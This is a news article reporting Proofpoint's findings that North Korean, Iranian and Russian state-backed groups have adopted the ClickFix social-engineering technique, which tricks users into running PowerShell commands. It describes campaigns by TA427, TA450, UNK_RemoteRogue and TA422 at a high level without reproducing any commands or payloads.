Emerging ClickFix Technique Gaining Traction Among State-Sponsored Hackers
Recent investigations by Proofpoint have unveiled a significant new trend in cyber espionage tactics employed by government-affiliated hacking groups from North Korea, Iran, and Russia. These actors are now utilizing the ClickFix technique, a method that leverages social engineering to exploit user trust through deceptive error messages or security alerts originating from commonly used software.
The ClickFix attack manipulates individuals into downloading and executing code on their command-line interfaces, misleading them into believing they are resolving legitimate issues. In reality, once activated, this code executes harmful commands, thereby compromising the victim’s system.
Proofpoint’s earlier findings highlighted the escalation in the use of ClickFix starting in March 2024, following reports from Hackread.com. The technique was noted to be increasingly popular among cybercriminals, particularly when groups such as TA571 and ClearFake incorporated it into their strategies. A marked rise in ClickFix-related incidents was recorded by Sekoia in October 2024, focusing on illegitimate Google Meet, Chrome, and Facebook clones designed to infect users with malware.
The ongoing utilization of ClickFix in attacks was particularly evident from July 2024 to early 2025, during which North Korean, Iranian, and Russian hackers integrated this technique into their operations. In early 2025, the North Korean group TA427, also known as Kimsuky or Emerald Sleet, targeted professionals across five think tank organizations focused on North Korean affairs. Their approach involved sending deceptive meeting invitations and creating fake websites that ultimately drove users to execute malicious PowerShell commands. A notable case included mimicking the identity of a Japanese diplomat, leading to the installation of QuasarRAT malware.
Separately, in November 2024, Iran’s TA450 group, recognized for operations like MuddyWater, targeted 39 organizations primarily in the finance and public sectors across the Middle East. Through fraudulent emails purporting to be Microsoft security updates, they employed ClickFix to entice users into executing PowerShell commands that installed the Level RMM tool, aimed at espionage and data exfiltration. Post-attack, there have been no indications of further ClickFix operations from this group.
The Russian hacking groups UNK_RemoteRogue and TA422 also featured in this evolving threat landscape. In December 2024, UNK_RemoteRogue launched a single ClickFix attack against individuals at two leading arms manufacturing firms, sending links embedded within emails directing targets to a counterfeit Microsoft Office page that incrementally executed malicious scripts. Meanwhile, TA422 targeted Ukrainian entities by launching phishing emails that disguised a Google spreadsheet link from CERT-UA, which redirected victims to a reCAPTCHA before executing dangerous PowerShell commands to establish SSH tunnels and utilize the Metasploit framework.
This evolution of tactics does not suggest a complete overhaul of attack methodologies but represents an adaptation, with ClickFix serving to streamline certain stages of infiltrating target systems and executing malware. Notably, Proofpoint’s research indicates a lack of evidence regarding the use of ClickFix by Chinese government-backed groups, which might stem from limited visibility into their operations.
While ClickFix has not yet become a standardized tool among state-sponsored actors, its rising adoption indicates a potential shift towards more widespread use of this technique in government-backed cyber espionage efforts in the foreseeable future. As the cyber threat landscape evolves, it is crucial for businesses to remain vigilant and informed about emerging tactics and their implications within the MITRE ATT&CK framework, which highlights adversary tactics such as initial access, execution, and persistence that may underpin these attacks.
